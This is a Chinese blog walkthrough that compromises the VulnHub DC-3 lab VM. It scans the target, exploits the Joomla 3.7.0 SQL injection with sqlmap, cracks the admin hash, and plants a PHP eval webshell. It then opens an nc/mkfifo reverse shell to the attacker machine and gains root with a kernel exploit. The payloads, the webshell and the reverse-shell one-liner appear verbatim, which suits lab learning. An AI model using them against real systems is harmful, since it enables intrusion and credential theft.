[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-3 通关详解 (附靶机搭建教程)
博主介绍
博主介绍:大家好,我是 _PowerShell ,很高兴认识大家~
✨主攻领域:【渗透领域】【数据通信】 【通讯安全】 【web安全】【面试分析】
点赞➕评论➕收藏 == 养成习惯(一键三连)
欢迎关注一起学习一起讨论⭐️一起进步文末有彩蛋
作者水平有限,欢迎各位大佬指点,相互学习进步!
文章目录
- 博主介绍
- 一、环境搭建:
-
- 1、靶场描述
- 2、下载靶场环境
- 3、启动靶场环境
- 二、渗透靶场
-
- 1、目标:
- 2、信息收集:寻找靶机真实IP
- 3、信息收集:探端口及服务
- 5、利用JoomScan进行扫描获取后台地址
-
- 1.JoomScan简介
- 2.JoomScan简单使用
- 3.joomScan扫描
- 6、利用nikto扫描获取后台地址
-
- 1.Nikto简介
- 2.Nikto简单使用
- 3.Nikto扫描
- 7、查找漏洞发现存在SQL注入
- 8、sqlmap跑出数据
-
- 1.跑出所有数据库
- 2.获取当前数据库的名字joomladb
- 3.获取获取joomladb的表名
- 4.获取joomladb的users表的字段名
- 5.获取目标字段username和password
- 9.利用john爆破密码snoopy
- 10.利用获取到的账号密码进行登录
- 11.上传webshell
- 12.蚁剑管理webshell
- 13.反弹shell到kali
-
- 1.kali监听
- 2.靶机连接
- 3.shell成功反弹
- 14.创建交互式shell
- 15.使用辅助脚本发现提权漏洞
-
- 1.下载辅助脚本Linux-Exploit-Suggester.sh
- 2.上传辅助脚本
- 3.发现漏洞
- 15.使用辅助脚本提权
-
- 1.获取提权脚本
- 2.上传39772.zip文件
- 3.提权
- 16.发现the-flag.txt
- 三、相关资源
一、环境搭建:
1、靶场描述
DC-3 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.
As with the previous DC releases, this one is designed with beginners in mind, although this time around, there is only one flag, one entry point and no clues at all.
Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.
For beginners, Google can be of great assistance, but you can always tweet me at @DCAU7 for assistance to get you going again. But take note: I won't give you the answer, instead, I'll give you an idea about how to move forward.
For those with experience doing CTF and Boot2Root challenges, this probably won't take you long at all (in fact, it could take you less than 20 minutes easily).
If that's the case, and if you want it to be a bit more of a challenge, you can always redo the challenge and explore other ways of gaining root and obtaining the flag.
只有一个flag
2、下载靶场环境
靶场下载地址:
https://www.vulnhub.com/entry/dc-32,312/
下载下来的文件如下
![[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-3 通关详解 (附靶机搭建教程)_第1张图片](http://img.e-com-net.com/image/info8/13f80e2cd5e141a3962be14fb3b9fd3a.jpg)
3、启动靶场环境
下载下来是虚拟机压缩文件,直接用Vmvare导入就行。
![[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-3 通关详解 (附靶机搭建教程)_第2张图片](http://img.e-com-net.com/image/info8/ec689814674c4005b7e5e91cd2df39f6.jpg)
设置虚拟机名称
![[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-3 通关详解 (附靶机搭建教程)_第3张图片](http://img.e-com-net.com/image/info8/a6aef5c6e5934ca89ee8ed0b95755c02.jpg)
导入中
![[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-3 通关详解 (附靶机搭建教程)_第4张图片](http://img.e-com-net.com/image/info8/857265c933144baab9ef2b355682731d.jpg)
导入完成之后打开后把网络模式设置为NAT模式。
![[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-3 通关详解 (附靶机搭建教程)_第5张图片](http://img.e-com-net.com/image/info8/49098e717b0940caae1c5ba2eb541768.jpg)
开启虚拟机报错
解决办法:https://blog.csdn.net/Aluxian_/article/details/123677000
![[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-3 通关详解 (附靶机搭建教程)_第6张图片](http://img.e-com-net.com/image/info8/f53fa08d3d9242b79820a702a58733ed.jpg)
虚拟机开启之后界面如下,我们不知道ip,需要自己探活,网段知道:192.168.233.0/24
![[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-3 通关详解 (附靶机搭建教程)_第7张图片](http://img.e-com-net.com/image/info8/986a44a66d414065bce1aa6270c33961.jpg)
二、渗透靶场
1、目标:
目标就是我们搭建的靶场,靶场IP为:192.168.233.0/24
![[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-3 通关详解 (附靶机搭建教程)_第8张图片](http://img.e-com-net.com/image/info8/e2cf7cf17729440da25e570c6dd16eaa.jpg)
2、信息收集:寻找靶机真实IP
nmap -sP 192.168.233.0/24
![[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-3 通关详解 (附靶机搭建教程)_第9张图片](http://img.e-com-net.com/image/info8/02365617d9a541088714a0307fbea2b6.jpg)
本机ip为192.168.233.130
所以分析可得靶机ip为192.168.233.179
192.168.233.1 vm8网卡
192.168.233.2 网关
192.168.233.179 靶机
192.168.233.254 DHCP服务器
192.168.233.130 kali本机
![[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-3 通关详解 (附靶机搭建教程)_第10张图片](http://img.e-com-net.com/image/info8/eb4d2a296324415d9c4d6a11a447b1bf.jpg)
3、信息收集:探端口及服务
nmap -A -p- -v 192.168.233.179
![[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-3 通关详解 (附靶机搭建教程)_第11张图片](http://img.e-com-net.com/image/info8/78666004907c462cb75330f94fa10eba.jpg)
发现开放了80端口,存在web服务,Apache/2.4.18,CMS为Joomla
5、利用JoomScan进行扫描获取后台地址
由于我们前面采用nmap进行扫描时我们已经发现了中间件为joomla,我们可以采用joomscan进行扫描,如果我们不知道是joomla,我们可以采用目录扫描或者nikto等扫描工具进行扫描。发现更多的信息。
1.JoomScan简介
OWASPJoomla!漏洞扫描器(JoomScan)是一个开源项目,其主要目的是实现漏洞检测的自动化,以增强Joomla CMS开发的安全性。该工具基于Perl开发,能够轻松无缝地对各种Joomla项目进行漏洞扫描,其轻量化和模块化的架构能够保证扫描过程中不会留下过多的痕迹。它不仅能够检测已知漏洞,而且还能够检测到很多错误配置漏洞和管理权限漏洞等等。除此之外,OWASP JoomScan使用起来非常简单,不仅提供了非常友好的用户界面,而且还能够以HTML或文本格式导出扫描报告。
2.JoomScan简单使用
执行默认检测:
perl joomscan.pl --url www.example.com
perl joomscan.pl -u www.example.com
枚举已安装的组件:
perl joomscan.pl --url www.example.com --enumerate-components
perl joomscan.pl -u www.example.com –ec
设置cookie:
perl joomscan.pl --url www.example.com --cookie "test=demo;"
设置user-agent:
perl joomscan.pl --url www.example.com --user-agent "Googlebot/2.1(+http://www.googlebot.com/bot.html)"
perl joomscan.pl -u www.example.com -a "Googlebot/2.1(+http://www.googlebot.com/bot.html)"
设置随机user-agent
perl joomscan.pl -u www.example.com --random-agent
perl joomscan.pl --url www.example.com -r
更新JoomScan:
perl joomscan.pl –update
3.joomScan扫描
joomscan --url http://192.168.233.179/
扫描结果如下
![[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-3 通关详解 (附靶机搭建教程)_第12张图片](http://img.e-com-net.com/image/info8/9ee47d24bdd245ed8026675ec49d9b19.jpg)
知道了joomla cms版本为3.7.0
得到了网站后台地址
http://192.168.233.179/administrator/
![[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-3 通关详解 (附靶机搭建教程)_第13张图片](http://img.e-com-net.com/image/info8/ef744c41c40c475e82818ee186e4d7f6.jpg)
6、利用nikto扫描获取后台地址
1.Nikto简介
Nikto是一个开源的WEB扫描评估软件,可以对Web服务器进行多项安全测试,能在230多种服务器上扫描出 2600多种有潜在危险的文件、CGI及其他问题。Nikto可以扫描指定主机的WEB类型、主机名、指定目录、特定CGI漏洞、返回主机允许的 http模式等。
2.Nikto简单使用
1、常规扫描
nikto -host/-h http://127.0.0.1
nikto -h http://127.0.0.1
2、可以指定端口进行扫描,同样可以指定SSL协议,进行HTTPS扫描。
nikto -h http:// 127.0.0.1 -p 443 ssl
3、指定子目录进行目录爆破
nikto -h http:// 127.0.0.1 -C /dvwa
4、批量扫描
nikto -host list.txt
5、升级更新插件
nikto -update
6、查看工具版本和插件版本
nikto -V
7、查看插件信息
nikto -list-plugins
8、命令查看帮助信息
nikto
9、查看更详细的帮助信息
nikto -H
man nikto
3.Nikto扫描
我们前面已经知道了CMS是joomla,并且知道了后台地址,针对于这一个靶场这一步没有任何意义,这里只是提供一个思路,目录扫描,这里就不拓展了。
nikto --url http://192.168.233.179/
![[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-3 通关详解 (附靶机搭建教程)_第14张图片](http://img.e-com-net.com/image/info8/bd6eb60f6f634b058098744e8d86a464.jpg)
得到了网站后台地址
http://192.168.233.179/administrator/
7、查找漏洞发现存在SQL注入
我们前面知道了CMS为joomla,版本为3.7.0
使用searchsploit检查到有对应的漏洞
searchsploit joomla 3.7.0
我们发现有一个SQL注入,还存在一个XSS
![[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-3 通关详解 (附靶机搭建教程)_第15张图片](http://img.e-com-net.com/image/info8/d37f1da0c10a4f3bb9ab96a6169c2753.jpg)
我们可以看一下这个漏洞的提示信息
Kali的exploits路径为/usr/share/exploitdb/exploits
Joomla3.7.0 exp信息路径为php/webapps/42033.txt
cat /usr/share/exploitdb/exploits/php/webapps/42033.txt
提示信息如下
# Exploit Title: Joomla 3.7.0 - Sql Injection
# Date: 05-19-2017
# Exploit Author: Mateus Lino
# Reference: https://blog.sucuri.net/2017/05/sql-injection-vulnerability-joomla-3-7.html
# Vendor Homepage: https://www.joomla.org/
# Version: = 3.7.0
# Tested on: Win, Kali Linux x64, Ubuntu, Manjaro and Arch Linux
# CVE : - CVE-2017-8917
URL Vulnerable: http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27
Using Sqlmap:
sqlmap -u "http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
Parameter: list[fullordering] (GET)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (DUAL)
Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(CASE WHEN (1573=1573) THEN 1573 ELSE 1573*(SELECT 1573 FROM DUAL UNION SELECT 9674 FROM DUAL) END)
Type: error-based
Title: MySQL >= 5.0 error-based - Parameter replace (FLOOR)
Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT 6600 FROM(SELECT COUNT(*),CONCAT(0x7171767071,(SELECT (ELT(6600=6600,1))),0x716a707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT * FROM (SELECT(SLEEP(5)))GDiu)
![[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-3 通关详解 (附靶机搭建教程)_第16张图片](http://img.e-com-net.com/image/info8/923f72ae2f9a490a83f3af60b6bc0b95.jpg)
我们看到了POC,我们验证一下,把localhost修改为我们的靶机IP就ok
http://192.168.233.179/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27
看到提示,数据库语句错误,说明进行了拼接,存在SQL注入
![[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-3 通关详解 (附靶机搭建教程)_第17张图片](http://img.e-com-net.com/image/info8/e4e6896aff5f4598a3e47b47b84e55f9.jpg)
8、sqlmap跑出数据
1.跑出所有数据库
sqlmap -u "http://192.168.233.179/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
![[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-3 通关详解 (附靶机搭建教程)_第18张图片](http://img.e-com-net.com/image/info8/c529f919c3a94261ae63ee41c501c895.jpg)
扫描结果
成功把数据库跑出来了
information_schema
joomladb
mysql
performance_schema
sys
![[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-3 通关详解 (附靶机搭建教程)_第19张图片](http://img.e-com-net.com/image/info8/7f1b4705b4a5496b8317a5248fc3686e.jpg)
2.获取当前数据库的名字joomladb
sqlmap -u "http://192.168.233.179/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -p list[fullordering] --current-db
跑出来当前使用数据库为joomladb
![[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-3 通关详解 (附靶机搭建教程)_第20张图片](http://img.e-com-net.com/image/info8/b168563565a14362b66ab9f78f1b7c3c.jpg)
3.获取获取joomladb的表名
sqlmap -u "http://192.168.233.179/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 -p list[fullordering] -D "joomladb" --tables
跑出76张表
![[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-3 通关详解 (附靶机搭建教程)_第21张图片](http://img.e-com-net.com/image/info8/e4f90000936f49dca5b9f960e12aad26.jpg)
Database: joomladb
[76 tables]
+---------------------+
| #__assets |
| #__associations |
| #__banner_clients |
| #__banner_tracks |
| #__banners |
| #__bsms_admin |
| #__bsms_books |
| #__bsms_comments |
| #__bsms_locations |
| #__bsms_mediafiles |
| #__bsms_message_typ |
| #__bsms_podcast |
| #__bsms_series |
| #__bsms_servers |
| #__bsms_studies |
| #__bsms_studytopics |
| #__bsms_teachers |
| #__bsms_templatecod |
| #__bsms_templates |
| #__bsms_timeset |
| #__bsms_topics |
| #__bsms_update |
| #__categories |
| #__contact_details |
| #__content_frontpag |
| #__content_rating |
| #__content_types |
| #__content |
| #__contentitem_tag_ |
| #__core_log_searche |
| #__extensions |
| #__fields_categorie |
| #__fields_groups |
| #__fields_values |
| #__fields |
| #__finder_filters |
| #__finder_links_ter |
| #__finder_links |
| #__finder_taxonomy_ |
| #__finder_taxonomy |
| #__finder_terms_com |
| #__finder_terms |
| #__finder_tokens_ag |
| #__finder_tokens |
| #__finder_types |
| #__jbsbackup_timese |
| #__jbspodcast_times |
| #__languages |
| #__menu_types |
| #__menu |
| #__messages_cfg |
| #__messages |
| #__modules_menu |
| #__modules |
| #__newsfeeds |
| #__overrider |
| #__postinstall_mess |
| #__redirect_links |
| #__schemas |
| #__session |
| #__tags |
| #__template_styles |
| #__ucm_base |
| #__ucm_content |
| #__ucm_history |
| #__update_sites_ext |
| #__update_sites |
| #__updates |
| #__user_keys |
| #__user_notes |
| #__user_profiles |
| #__user_usergroup_m |
| #__usergroups |
| #__users |
| #__utf8_conversion |
| #__viewlevels |
+---------------------+
观察表名,很明显,我们会关注#__users这张表
4.获取joomladb的users表的字段名
sqlmap -u "http://192.168.233.179/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 -p list[fullordering] -D "joomladb" --tables -T "#__users" --columns
第一个选项,直接回车使用默认的“Y”
第二个选项,使用“y”,不要使用默认的,不然会出错
第三个选项随意
第四个选项使用10线程
![[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-3 通关详解 (附靶机搭建教程)_第22张图片](http://img.e-com-net.com/image/info8/46acfcaec0e943f5948f377dab7a53b7.jpg)
最终跑出来6个字段
![[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-3 通关详解 (附靶机搭建教程)_第23张图片](http://img.e-com-net.com/image/info8/0a618401f41d4aa09062203b87c6a111.jpg)
Database: joomladb
Table: #__users
[6 columns]
+----------+-------------+
| Column | Type |
+----------+-------------+
| email | non-numeric |
| id | numeric |
| name | non-numeric |
| params | non-numeric |
| password | non-numeric |
| username | non-numeric |
+----------+-------------+
5.获取目标字段username和password
sqlmap -u "http://192.168.233.179/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 -p list[fullordering] -D "joomladb" --tables -T "#__users" --columns -C "username,password" --dump
获得结果如下
拿到一个用户名和加密的密码
Database: joomladb
Table: #__users
[1 entry]
+----------+--------------------------------------------------------------+
| username | password |
+----------+--------------------------------------------------------------+
| admin | $2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu |
+----------+--------------------------------------------------------------+
![[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-3 通关详解 (附靶机搭建教程)_第24张图片](http://img.e-com-net.com/image/info8/dce88ac7f710459a8a3e5ff286968e4a.jpg)
9.利用john爆破密码snoopy
使用john破解出admin密码,john the ripper是一款本地密码破解工具,可以从我们上面生成的shadow文件(密码散列)中破解出密码。破解时间取决于密码的复杂程度以及破解模式。
创建一个admin_pass.txt,把加密的密码字段写入
![[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-3 通关详解 (附靶机搭建教程)_第25张图片](http://img.e-com-net.com/image/info8/b107b9149d224ef4bd8116650ba78b3e.jpg)
使用john破解出admin密码是snoopy
john admin_pass.txt
![[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-3 通关详解 (附靶机搭建教程)_第26张图片](http://img.e-com-net.com/image/info8/3410d62dfbbe4687b773953cf59771f7.jpg)
10.利用获取到的账号密码进行登录
http://192.168.233.179/administrator/
admin/snoopy
![[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-3 通关详解 (附靶机搭建教程)_第27张图片](http://img.e-com-net.com/image/info8/06f31b4ecb3f4cc7975cc136f0ec3283.jpg)
登陆成功
![[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-3 通关详解 (附靶机搭建教程)_第28张图片](http://img.e-com-net.com/image/info8/96d69799901b446f9dcbd4993a7bef28.jpg)
进入主页
http://192.168.233.179/
他告诉我们这次DC-3实战只有一个目标获得root权限
![[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-3 通关详解 (附靶机搭建教程)_第29张图片](http://img.e-com-net.com/image/info8/1eefbfaf488447c5a7e750470b989f1a.jpg)
11.上传webshell
发现一个上传点
![[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-3 通关详解 (附靶机搭建教程)_第30张图片](http://img.e-com-net.com/image/info8/2b2bfa51a5d9431a9833e63fe58c64e7.jpg)
点击Beez3 Details and Files进入
![[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-3 通关详解 (附靶机搭建教程)_第31张图片](http://img.e-com-net.com/image/info8/740b9d2dbfe14b578110ac620ef30d08.jpg)
点击newfiles
![[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-3 通关详解 (附靶机搭建教程)_第32张图片](http://img.e-com-net.com/image/info8/ae6c99a2517e41eb8feba38bb538cf47.jpg)
这儿我们发现可以上传文件,考虑上传木马,也可以创建文件进行编辑
![[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-3 通关详解 (附靶机搭建教程)_第33张图片](http://img.e-com-net.com/image/info8/93f617e2fed745da97e0b71391bb3faa.jpg)
要上传木马,我们先要找到当前文件所在的目录:
http://192.168.159.141/templates/beez3/html/
![[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-3 通关详解 (附靶机搭建教程)_第34张图片](http://img.e-com-net.com/image/info8/d5da8c420e5542d882c4bf32fe1a95c0.jpg)
回到刚才的页面点击new file
在html下创建一个php文件,名字叫做powershell
![[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-3 通关详解 (附靶机搭建教程)_第35张图片](http://img.e-com-net.com/image/info8/68a41bd5adaf46cc906b25be9620aaf6.jpg)
创建成功之后,跳到编辑页面,然后我们输入php一句话,点击左上角绿色的save进行保存
<?php
echo ("密码是powershell") ;
@eval($_ REQUEST [powershell] ) ;
?>
![[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-3 通关详解 (附靶机搭建教程)_第36张图片](http://img.e-com-net.com/image/info8/3a410bbc756b4811892fb465f61a0d76.jpg)
再次访问http://192.168.233.179/templates/beez3/html/
发现多了一个powershell.php文件,我们访问一下
![[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-3 通关详解 (附靶机搭建教程)_第37张图片](http://img.e-com-net.com/image/info8/41bb86b46e654b18bfaf86df24b9e0d1.jpg)
访问webshell,得到我们设置的会先内容,文件上传成功
http://192.168.233.179/templates/beez3/html/powershell.php
![[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-3 通关详解 (附靶机搭建教程)_第38张图片](http://img.e-com-net.com/image/info8/390ae39ea6ad4f5aa8244f876974b5d1.jpg)
12.蚁剑管理webshell
右键添加数据
![[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-3 通关详解 (附靶机搭建教程)_第39张图片](http://img.e-com-net.com/image/info8/73e281ae3e5d434d9a2fd70403e16a53.jpg)
输入webshell地址和连接密码
http://192.168.233.179/templates/beez3/html/powershell.php
powershell
![[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-3 通关详解 (附靶机搭建教程)_第40张图片](http://img.e-com-net.com/image/info8/9ba10a8a05ee443bb80f72eba96c8fd0.jpg)
右键进入虚拟终端
![[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-3 通关详解 (附靶机搭建教程)_第41张图片](http://img.e-com-net.com/image/info8/286d522806514478973736f867de01ef.jpg)
执行whaomi查询我权限,是www-data权限
![[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-3 通关详解 (附靶机搭建教程)_第42张图片](http://img.e-com-net.com/image/info8/39bb8a7aa8d845adb819747ec1a12dcb.jpg)
13.反弹shell到kali
蚁剑看到的终端不如kali清晰,反弹一个shell到kali
1.kali监听
nc -lvvp 55555
![[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-3 通关详解 (附靶机搭建教程)_第43张图片](http://img.e-com-net.com/image/info8/5fc85bf5758d41b7aa9550ba66ff0059.jpg)
2.靶机连接
nc -e /bin/bash 192.168.233.130 55555
发现-e参数不可用
![[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-3 通关详解 (附靶机搭建教程)_第44张图片](http://img.e-com-net.com/image/info8/b807d7f1de8d40dcb46c2a002df69430.jpg)
使用如下目录连接
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.233.130 55555 >/tmp/f
3.shell成功反弹
![[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-3 通关详解 (附靶机搭建教程)_第45张图片](http://img.e-com-net.com/image/info8/a0af24e997ff468bb3a0eb65dababdcf.jpg)
14.创建交互式shell
经常用shell的小伙伴都知道这个shell不好用,我们建立一个交互式shell
常用的就是python创建交互式shell
python3 -c 'import pty; pty.spawn("/bin/bash")'
交互式shell创建成功
![[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-3 通关详解 (附靶机搭建教程)_第46张图片](http://img.e-com-net.com/image/info8/5c2f3b0394ac47528049cfb9d6b8107e.jpg)
15.使用辅助脚本发现提权漏洞
1.下载辅助脚本Linux-Exploit-Suggester.sh
下载地址:
https://github.com/mzet-/linux-exploit-suggester
2.上传辅助脚本
我们直接在蚁剑中上传
![[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-3 通关详解 (附靶机搭建教程)_第47张图片](http://img.e-com-net.com/image/info8/9029aee2630f4e4e8ebeac4c63c051ef.jpg)
上传成功
![[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-3 通关详解 (附靶机搭建教程)_第48张图片](http://img.e-com-net.com/image/info8/ec3acbc4b1ef4deda9832e955f9342e3.jpg)
3.发现漏洞
ls -l linux-exploit-suggester
发现没有执行权限,我们给他加个执行文件
chmod +x linux-exploit-suggester
![[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-3 通关详解 (附靶机搭建教程)_第49张图片](http://img.e-com-net.com/image/info8/8c7acce2b5594ca39d6a8c0872d9201b.jpg)
执行脚本
./inux-exploit-suggester
发现很多可利用漏洞
![[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-3 通关详解 (附靶机搭建教程)_第50张图片](http://img.e-com-net.com/image/info8/1bcb772fe90d410694f8424b28492415.jpg)
![[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-3 通关详解 (附靶机搭建教程)_第51张图片](http://img.e-com-net.com/image/info8/fbfe8f522dba40308916c3c954569589.jpg)
![[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-3 通关详解 (附靶机搭建教程)_第52张图片](http://img.e-com-net.com/image/info8/f6ea9ded0d2f435e9b643248a981a03b.jpg)
![[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-3 通关详解 (附靶机搭建教程)_第53张图片](http://img.e-com-net.com/image/info8/73f9b3ce4b6b4ecfb6426b66caba7797.jpg)
15.使用辅助脚本提权
1.获取提权脚本
上面发现了很多漏洞,这里我们挑一个进行提权
挑选CVE-2016-4557
在图片里可以看到是一个39772的文件,由于给出的那个URL无法下载
也可以直接下载我这里提前下载好的
https://pan.baidu.com/s/1Syct4OjCO5PWaEQm6EZ1Ow?pwd=u9r7
也可以去searchsploit里面去看看
![[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-3 通关详解 (附靶机搭建教程)_第54张图片](http://img.e-com-net.com/image/info8/c53306af32f04b949dbc0f739f23171e.jpg)
cat /usr/share/exploitdb/exploits/linux/local/39772.txt
查看文件内容,发现39772.zip下载链接
![[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-3 通关详解 (附靶机搭建教程)_第55张图片](http://img.e-com-net.com/image/info8/3fb923aa5d574b55ab3d58f638d131ae.jpg)
![[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-3 通关详解 (附靶机搭建教程)_第56张图片](http://img.e-com-net.com/image/info8/420b67e6e29f4e4c9c3db664a8fef7b1.jpg)
2.上传39772.zip文件
再次使用中国蚁剑上传文件,然后kali操作文件,要一步步进入到文件用法中提到的/ebpf_mapfd_doubleput目录下
kali右键,上传文件,选择刚刚下载的39772.zip进行上传
![[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-3 通关详解 (附靶机搭建教程)_第57张图片](http://img.e-com-net.com/image/info8/8f8f05dc447a46378348ec9dc20e3f98.jpg)
文件上传成功
![[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-3 通关详解 (附靶机搭建教程)_第58张图片](http://img.e-com-net.com/image/info8/d8de5c89d16e44d4a6bf2d7575693a62.jpg)
3.提权
解压文件
unzip 39772.zip
![[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-3 通关详解 (附靶机搭建教程)_第59张图片](http://img.e-com-net.com/image/info8/599b55bfe2b94d97b1006f8494078f96.jpg)
cd 33792
ls
![[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-3 通关详解 (附靶机搭建教程)_第60张图片](http://img.e-com-net.com/image/info8/044545ed1f5042cd8d62e8346cf180aa.jpg)
tar -xvf exploit.tar
cd ebpf_mapfd_doubleput_exploit
![[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-3 通关详解 (附靶机搭建教程)_第61张图片](http://img.e-com-net.com/image/info8/a153b811be2d41ee8309b6b247492a40.jpg)
./compile.sh
./doubleput
执行完之后,提权成功
![[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-3 通关详解 (附靶机搭建教程)_第62张图片](http://img.e-com-net.com/image/info8/97ce893c18e24bdda7d736035cd7936d.jpg)
获得root权限
![[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-3 通关详解 (附靶机搭建教程)_第63张图片](http://img.e-com-net.com/image/info8/640c2344801e42778e064b8d4856cc14.jpg)
16.发现the-flag.txt
ls
cat the-flag.txt
![[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-3 通关详解 (附靶机搭建教程)_第64张图片](http://img.e-com-net.com/image/info8/4f4e938e23064527972012ea5d455b55.jpg)
三、相关资源
1、靶场下载地址
2、DC-3启动问题
3、nmap
4、joomscan
5、Nikto
6、[ 渗透工具篇 ] sqlmap 详解(一) sqlmap 安装详解
7、实现交互式shell的几种方式
8、[ 隧道技术 ] 反弹shell的集中常见方式(一)nc反弹shell
9、提权辅助工具集合
10、Linux-Exploit-Suggester.sh
11、[ 常用工具篇 ] AntSword 蚁剑安装及使用详解
12、jhon